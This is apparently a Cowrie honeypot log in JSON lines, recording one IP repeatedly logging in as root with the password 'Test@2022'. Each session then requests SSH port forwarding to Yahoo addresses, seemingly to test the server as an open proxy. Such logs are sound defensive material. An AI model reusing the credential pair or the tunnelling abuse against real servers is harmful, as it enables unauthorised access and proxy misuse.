{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.588112Z","src_ip":"213.209.150.239","session":"7daa8c2b52e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.870648Z","src_ip":"213.209.150.239","session":"7daa8c2b52e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":6949,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6949","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.928242Z","session":"7daa8c2b52e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:07.985846Z","src_ip":"213.209.150.239","session":"7daa8c2b52e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9629,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9629","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.143152Z","session":"7daa8c2b52e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.200074Z","src_ip":"213.209.150.239","session":"7daa8c2b52e2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.258309Z","src_ip":"213.209.150.239","session":"7daa8c2b52e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":16991,"dst_ip":"1.2.3.4","dst_port":22,"session":"04c152fac1f2","protocol":"ssh","message":"New connection: 213.209.150.239:16991 (1.2.3.4:22) [session: 04c152fac1f2]","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.313793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.314627Z","src_ip":"213.209.150.239","session":"04c152fac1f2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.371077Z","src_ip":"213.209.150.239","session":"04c152fac1f2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.654737Z","src_ip":"213.209.150.239","session":"04c152fac1f2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":2874,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2874","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.712273Z","session":"04c152fac1f2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.769042Z","src_ip":"213.209.150.239","session":"04c152fac1f2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":5322,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:5322","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.923401Z","session":"04c152fac1f2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:08.980169Z","src_ip":"213.209.150.239","session":"04c152fac1f2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.037578Z","src_ip":"213.209.150.239","session":"04c152fac1f2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17051,"dst_ip":"1.2.3.4","dst_port":22,"session":"14bf77995636","protocol":"ssh","message":"New connection: 213.209.150.239:17051 (1.2.3.4:22) [session: 14bf77995636]","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.093087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.093728Z","src_ip":"213.209.150.239","session":"14bf77995636"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.150742Z","src_ip":"213.209.150.239","session":"14bf77995636"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.433053Z","src_ip":"213.209.150.239","session":"14bf77995636"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":29373,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29373","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.490720Z","session":"14bf77995636"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.547817Z","src_ip":"213.209.150.239","session":"14bf77995636"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":9184,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9184","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.703101Z","session":"14bf77995636"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.759994Z","src_ip":"213.209.150.239","session":"14bf77995636"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.817872Z","src_ip":"213.209.150.239","session":"14bf77995636"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17109,"dst_ip":"1.2.3.4","dst_port":22,"session":"04c6638cba27","protocol":"ssh","message":"New connection: 213.209.150.239:17109 (1.2.3.4:22) [session: 04c6638cba27]","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.864578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.867248Z","src_ip":"213.209.150.239","session":"04c6638cba27"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:09.914618Z","src_ip":"213.209.150.239","session":"04c6638cba27"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.150253Z","src_ip":"213.209.150.239","session":"04c6638cba27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":24275,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:24275","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.198354Z","session":"04c6638cba27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.245841Z","src_ip":"213.209.150.239","session":"04c6638cba27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":31821,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:31821","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.381675Z","session":"04c6638cba27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.429063Z","src_ip":"213.209.150.239","session":"04c6638cba27"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.478459Z","src_ip":"213.209.150.239","session":"04c6638cba27"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17165,"dst_ip":"1.2.3.4","dst_port":22,"session":"739e95a437ce","protocol":"ssh","message":"New connection: 213.209.150.239:17165 (1.2.3.4:22) [session: 739e95a437ce]","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.534060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.534895Z","src_ip":"213.209.150.239","session":"739e95a437ce"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.591985Z","src_ip":"213.209.150.239","session":"739e95a437ce"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.874958Z","src_ip":"213.209.150.239","session":"739e95a437ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":4206,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:4206","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.932906Z","session":"739e95a437ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:10.989713Z","src_ip":"213.209.150.239","session":"739e95a437ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":5036,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5036","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.147028Z","session":"739e95a437ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.203686Z","src_ip":"213.209.150.239","session":"739e95a437ce"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.261332Z","src_ip":"213.209.150.239","session":"739e95a437ce"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17223,"dst_ip":"1.2.3.4","dst_port":22,"session":"dec1b6e5d210","protocol":"ssh","message":"New connection: 213.209.150.239:17223 (1.2.3.4:22) [session: dec1b6e5d210]","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.307255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:11.308177Z","src_ip":"213.209.150.239","session":"dec1b6e5d210"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 